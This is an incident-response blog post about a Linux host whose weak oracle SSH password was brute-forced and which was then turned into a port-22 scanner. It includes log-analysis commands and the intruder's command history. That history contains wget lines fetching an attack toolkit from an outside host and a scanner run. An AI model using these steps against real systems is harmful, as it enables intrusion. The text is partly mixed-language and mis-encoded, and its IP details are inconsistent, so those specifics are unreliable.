2021-02-03 Category: Website building
1. It started with the firewall going down
Before I had even reached the office this morning I was told by phone that the office could no longer reach the Internet properly: the connection was extremely slow and web pages would not load. I hurried in and started looking for the problem.
The switch was ruled out first, because the internal LAN was working normally. Pinging the firewall showed heavy packet loss, so the firewall was clearly in trouble and could not cope; its web management interface would not even accept a login. I contacted the vendor to troubleshoot remotely, and after nearly three hours of analysis the conclusion was that two hosts on the internal network
主機(jī)A配置如下:
- OS?-?RedHat?Enterprise?Linux?Server?release?6.x?
- 部署軟件?-?Tomcat,sshd,?oracle?
- RAM?-?8GB?
- CPU?-?Intel?Core?i3-2130?
- IP地址?-?172.16.111.22?
本文只對(duì)主機(jī)A進(jìn)行分析處理。
通過(guò)防火墻命令行界面,抓包發(fā)現(xiàn)A機(jī)器瘋狂對(duì)一組IP地址進(jìn)行22端口掃描。下面是抓包結(jié)果片段:
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:39895=====>183.58.99.130:22,?packet=3,?bytes=208[REPLY]?183.58.99.130:22=====>59.46.161.39:39895,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:33967=====>183.58.99.131:22,?packet=3,?bytes=208[REPLY]?183.58.99.131:22=====>59.46.161.39:33967,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:34117=====>183.58.99.132:22,?packet=3,?bytes=208[REPLY]?183.58.99.132:22=====>59.46.161.39:34117,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:54932=====>183.58.99.125:22,?packet=3,?bytes=208[REPLY]?183.58.99.125:22=====>59.46.161.39:54932,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:60333=====>183.58.99.135:22,?packet=3,?bytes=208[REPLY]?183.58.99.135:22=====>59.46.161.39:60333,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:52737=====>183.58.99.136:22,?packet=3,?bytes=208[REPLY]?183.58.99.136:22=====>59.46.161.39:52737,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:52291=====>183.58.99.137:22,?packet=3,?bytes=208[REPLY]?183.58.99.137:22=====>59.46.161.39:52291,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:46183=====>183.58.99.138:22,?packet=3,?bytes=208[REPLY]?183.58.99.138:22=====>59.46.161.39:46183,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:36864=====>183.58.99.139:22,?packet=3,?bytes=208[REPLY]?183.58.99.139:22=====>59.46.161.39:36864,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:34515=====>183.58.99.133:22,?packet=3,?bytes=208[REPLY]?183.58.99.133:22=====>59.46.161.39:34515,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:57121=====>183.58.99.134:22,?packet=3,?bytes=208[REPLY]?183.58.99.134:22=====>59.46.161.39:57121,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:37830=====>183.58.99.140:22,?packet=3,?bytes=208[REPLY]?183.58.99.140:22=====>59.46.161.39:37830,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:42742=====>183.58.99.141:22,?packet=3,?bytes=208[REPLY]?183.58.99.141:22=====>59.46.161.39:42742,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:55018=====>183.58.99.142:22,?packet=3,?bytes=208[REPLY]?183.58.99.142:22=====>59.46.161.39:55018,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:46447=====>183.58.99.143:22,?packet=3,?bytes=208[REPLY]?183.58.99.143:22=====>59.46.161.39:46447,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:51039=====>183.58.99.147:22,?packet=3,?bytes=208[REPLY]?183.58.99.147:22=====>59.46.161.39:51039,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:33123=====>183.58.99.146:22,?packet=3,?bytes=208[REPLY]?183.58.99.146:22=====>59.46.161.39:33123,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:35956=====>183.58.99.151:22,?packet=3,?bytes=208[REPLY]?183.58.99.151:22=====>59.46.161.39:35956,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:45002=====>183.58.99.145:22,?packet=3,?bytes=208[REPLY]?183.58.99.145:22=====>59.46.161.39:45002,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:54711=====>183.58.99.150:22,?packet=3,?bytes=208[REPLY]?183.58.99.150:22=====>59.46.161.39:54711,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:58976=====>183.58.99.155:22,?packet=3,?bytes=208[REPLY]?183.58.99.155:22=====>59.46.161.39:58976,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:37967=====>183.58.99.157:22,?packet=3,?bytes=208[REPLY]?183.58.99.157:22=====>59.46.161.39:37967,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:47125=====>183.58.99.158:22,?packet=3,?bytes=208[REPLY]?183.58.99.158:22=====>59.46.161.39:47125,?packet=0,?bytes=0?
- proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:35028=====>183.58.99.156:22,?packet=3,?bytes=208[REPLY]?183.58.99.156:22=====>59.46.161.39:35028,?packet=0,?bytes=0?
可以清晰的看到,肉雞掃描程序瘋狂掃描一個(gè)網(wǎng)段內(nèi)的22端口。
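The scan signature above (one internal source, many consecutive destinations on the same port, no reply packets) can be picked out of a session-table dump automatically. The following shell script is an added example and is not part of the original article or of the firewall vendor's tooling: it parses the `src:port=====>dst:port` field of each entry, counts distinct destinations per internal source and destination port, and counts sessions the far end never answered. The sample entries are constructed in the format quoted above (five scanner sessions plus two ordinary HTTPS sessions from another host); the comma-separated layout and the `[REPLY] ... packet=0` convention are assumptions taken from that excerpt, and the file name is an assumption.

```shell
#!/bin/sh
# Added example, not from the original article: spot port-scanning hosts in a
# firewall session-table dump. The input format is assumed to match the
# excerpt in the article (comma-separated, request side before "[REPLY]").

SESSIONS="${TMPDIR:-/tmp}/fw-sessions.sample.$$"
# Constructed sample: five half-open SSH sessions from one internal host to
# consecutive addresses, plus two normal HTTPS sessions from another host.
cat > "$SESSIONS" <<'EOF'
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:39895=====>183.58.99.130:22, packet=3, bytes=208[REPLY] 183.58.99.130:22=====>59.46.161.39:39895, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:33967=====>183.58.99.131:22, packet=3, bytes=208[REPLY] 183.58.99.131:22=====>59.46.161.39:33967, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:34117=====>183.58.99.132:22, packet=3, bytes=208[REPLY] 183.58.99.132:22=====>59.46.161.39:34117, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:54932=====>183.58.99.133:22, packet=3, bytes=208[REPLY] 183.58.99.133:22=====>59.46.161.39:54932, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:119s,172.16.35.201:60333=====>183.58.99.134:22, packet=9, bytes=1406[REPLY] 183.58.99.134:22=====>59.46.161.39:60333, packet=7, bytes=1820
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:3600s,172.16.111.8:51022=====>203.0.113.10:443, packet=42, bytes=6130[REPLY] 203.0.113.10:443=====>59.46.161.39:51022, packet=55, bytes=71204
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:3600s,172.16.111.8:51023=====>203.0.113.10:443, packet=12, bytes=1130[REPLY] 203.0.113.10:443=====>59.46.161.39:51023, packet=15, bytes=21204
EOF

scan_sources() {
    # Usage: scan_sources FILE MIN_TARGETS
    # Prints "<internal_src> <dport> <distinct_targets> <unanswered>" for each
    # source that touched at least MIN_TARGETS distinct destinations on one
    # port; <unanswered> is the number of those sessions with no reply packet.
    awk -v min="$2" '
        {
            nf = split($0, f, ",")
            if (nf < 4 || split(f[4], ends, "=====>") != 2) next
            split(ends[1], s, ":")      # s[1]=internal source, s[2]=source port
            split(ends[2], d, ":")      # d[1]=destination,     d[2]=destination port
            key = s[1] " " d[2]
            if (!((key, d[1]) in seen)) { seen[key, d[1]] = 1; targets[key]++ }
            if ($0 ~ /\[REPLY\].*packet=0,/) unanswered[key]++
        }
        END {
            for (k in targets)
                if (targets[k] >= min) print k, targets[k], unanswered[k] + 0
        }' "$1" | sort
}

scan_sources "$SESSIONS" 3
```

Run against the constructed sample this reports `172.16.35.201 22 5 4`: five distinct port-22 targets, four of them never answered, while the host with two real HTTPS sessions stays below the threshold. On a real dump the threshold should be set well above the number of distinct hosts a legitimate internal machine talks to on that port.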
2. How to trace what the intruder did
On a Linux host the main basis for post-incident analysis is the logs. /var/log/messages and /var/log/secure are essential, followed by the .bash_history command record. An intruder who logs in inevitably leaves traces in the logs; a skilled attacker may wipe them, but most attackers today are opportunists running ready-made tools with little technical background. Bear in mind that .bash_history is only written when the shell exits and is trivially disabled or truncated, so an empty history proves nothing. The host exposed three listening TCP ports:
- 22 sshd
- 80 Tomcat
- 1521 Oracle
Any of the three services could have an exploitable vulnerability, but by far the most common attack is brute-forcing sshd usernames and passwords, so /var/log/secure was analysed first to review the login history.
3. How the compromise unfolded
3.1 The oracle account password is brute-forced
Reviewing /var/log/secure was a shock: the log had already rotated into four files, each full of login attempts. Running:
- cat secure-20150317 | grep 'Failed password' | cut -d " " -f 9,10,11 | sort | uniq
gave the following (note that cut by column number works here because the day of the month has two digits; on single-digit days syslog pads with a second space and the columns shift):
- invalid user admin
- invalid user dacx
- invalid user details3
- invalid user drishti
- invalid user ferreluque
- invalid user git
- invalid user hall
- invalid user jparksu
- invalid user last
- invalid user patrol
- invalid user paul
- invalid user pgadmin
- invalid user postgres
- invalid user public
- invalid user sauser
- invalid user siginspect
- invalid user sql
- invalid user support
- invalid user sys
- invalid user sysadmin
- invalid user system
- invalid user taz
- invalid user test
- invalid user tiptop
- invalid user txl5460
- invalid user ubnt
- invalid user www
- mysql from 10.10.10.1
- oracle from 10.10.10.1
- root from 10.10.10.1
The attack program kept cycling through different accounts and passwords. Near the end of the file the following two lines show that it got in:
- Mar 9 20:35:30 localhost sshd[30379]: Accepted password for oracle from 10.10.10.1 port 56906 ssh2
- Mar 9 20:35:30 localhost sshd[30379]: pam_unix(sshd:session): session opened for user oracle by (uid=0)
The oracle account's password had been guessed and the attacker logged in successfully. Note that every attempt, and the successful login, is recorded from 10.10.10.1, a private address, so the sshd log alone does not identify the external source; the firewall's NAT or session logs would be needed for that.
3.2 Reconstructing the intruder's actions
Next, what did the intruder do with the oracle account? First, take a copy of oracle's command history so that later work on the box cannot overwrite it:
- cp /home/oracle/.bash_history hacker_history
Then read through the copy. My reading of the intruder's intent is noted after each command.
- vi .bash_profile
- vi .bash_profile (view .bash_profile and its variable settings; add /home/oracle/bin to PATH)
- ll
- cd /
- vi .bash_profile
- vi .bash_profile (apply the environment variable settings)
- w
- ps x (list running processes)
- free -m (check memory size)
- uname -a (check the kernel and system version)
- cat /etc/issue (check the distribution release)
- cat /etc/hosts (look for other machines on the internal network)
- cat /proc/cpuinfo (check the CPU model)
- cat .bash_history (read the oracle account's command history)
- w (check system load)
- ls -a (list hidden files under /home/oracle/)
- passwd (change the oracle account's password)
- exit
- ls
- oracle
- sqlplus (run sqlplus)
- su (attempt to switch to root)
- app1123456 (a guess at the root password, typed at the shell prompt and therefore captured in the history)
- ls
- su -
- w
- free -m
- php -v (check the PHP version)
- exit
- w
- free -m
- php -v
- ps aux
- ls -a
- exit
- w
- free -m
- php -v
- cat bash_his (read the command history)
- cat bash_history
- cat .bash_history
- wget scriptcoders.ucoz.com/piata.tgz (download the scanning and brute-force toolkit)
- tar zxvf piata.tgz (unpack it)
- rm -rf piata.tgz (delete the archive)
- cd piata/ (enter the toolkit directory)
- ls -a
- chmod +x *
- ./a 210.212 (run the scanner against the 210.212 range)
- screen (try to run screen; it is not installed, so download it)
- ls -a
- wget scriptcoders.ucoz.com/screen.tgz
- tar zxvf screen.tgz (unpack)
- ./screen
- exit
- w
- ps x
- cd piata/ (enter the toolkit directory)
- ls -a
- cat vuln.txt (check the scan results)
- ls -a
- mv vuln.txt 1.txt (save the results)
- ./screen -r
- nano 1.txt (view the results file)
- w
- ps x
- exit
- cd piata
- ps x
- ls -a
- nano 2.txt
- exit
- w
- ps x
- cd piata/
- ls -a
- cat
- mv vuln.txt 2.txt (save the results)
- nano 2.txt
- w
- ps x
- cd piata/
- ls- a
- cat vuln.txt
- rm -rf vuln.txt
- ./screen -r
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- ls -a
- mv vuln.txt 3.txt (save the results)
- nano 3.txt
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- rm -rf vuln.txt
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- rm -rf vuln.txt
- rm -rf 1.txt
- rm -rf 2.txt
- rm -rf 2.txt.save
- rm -rf 3.txt
- screen -r
- ./screen -r
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- ls -a
- nano vuln.txt
- rm -rf vuln.txt
- screen -r
- ./screen -r
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- nano vuln.txt
- w
- ls -a
- rm -rf vuln.txt
- screen -r
- ./screen -r
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- rm -rf vuln.txt
- ps x
- ls -a
- ./screen -r
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- nano vuln.txt
- w
- rm -rf vuln.txt
- ./screen -r
- exit
3.3 The attack toolkit
The command history shows that the toolkit is the package named piata. Here is what it looks like on disk:
- [root@localhost piata]# ll
- total 1708
- -rw-r--r--. 1 oracle oinstall 0 Mar 10 13:01 183.63.pscan.22
- -rwxr-xr-x. 1 oracle oinstall 659 Feb 2 2008 a
- -rwxr-xr-x. 1 oracle oinstall 216 May 18 2005 auto
- -rwxr-xr-x. 1 oracle oinstall 283 Nov 25 2004 gen-pass.sh
- -rwxr-xr-x. 1 oracle oinstall 93 Apr 19 2005 go.sh
- -rwxr-xr-x. 1 oracle oinstall 3253 Mar 5 2007 mass
- -rwxr-xr-x. 1 oracle oinstall 12671 May 18 2008 pass_file
- -rwxr-xr-x. 1 oracle oinstall 21407 Jul 22 2004 pscan2
- -rwxr-xr-x. 1 oracle oinstall 249980 Feb 13 2001 screen
- -rw-r--r--. 1 oracle oinstall 130892 Feb 3 2010 screen.tgz
- -rwxr-xr-x. 1 oracle oinstall 453972 Jul 13 2004 ss
- -rwxr-xr-x. 1 oracle oinstall 842736 Nov 24 2004 ssh-scan
- -rw-r--r--. 1 oracle oinstall 2392 Mar 10 05:03 vuln.txt
Of these, a, auto, go.sh and gen-pass.sh are bash scripts that set the target range and invoke the scanners; pscan2 and ssh-scan are the scanner programs. vuln.txt holds the list of hosts that were broken into. Judging by the file names, pscan2 enumerates hosts with port 22 open (the empty 183.63.pscan.22 is its output for the 183.63 range, which matches the 183.58/183.63 addresses seen in the firewall capture) and ssh-scan then tries the credential list in pass_file against them, which is precisely how this host itself was compromised.
So far no other system files have been found modified, and nothing was set up to start the tool automatically. That conclusion is worth backing with a package integrity check (rpm -Va), a review of the user and system crontabs, rc scripts and shell start-up files (the intruder already edited .bash_profile), and a check that the oracle account's password, which the intruder changed with passwd, has been reset.
4. Lessons learned
The machine attacked this time was only a test host of little importance in itself, yet it brought down the firewall and with it the whole office's Internet access. That deserves serious attention, and there are lessons to draw.
System account passwords must have real complexity. This attack succeeded because the oracle account's password was far too simple.
Password login over sshd carries substantial risk, especially with weak passwords. Wherever possible, disable password authentication and switch to public-key authentication.
As a data-centre administrator you must supervise the security practices of both the system administrators and the software vendors. The compromised host had been handed over entirely to the web development company, and that company paid no attention to operational security.
本文標(biāo)題:一次服務(wù)器淪陷為肉雞后的實(shí)戰(zhàn)排查過(guò)程!
當(dāng)前鏈接:http://jinyejixie.com/news/99009.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供手機(jī)網(wǎng)站建設(shè)、ChatGPT、網(wǎng)站營(yíng)銷、動(dòng)態(tài)網(wǎng)站、網(wǎng)站制作、域名注冊(cè)
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)
猜你還喜歡下面的內(nèi)容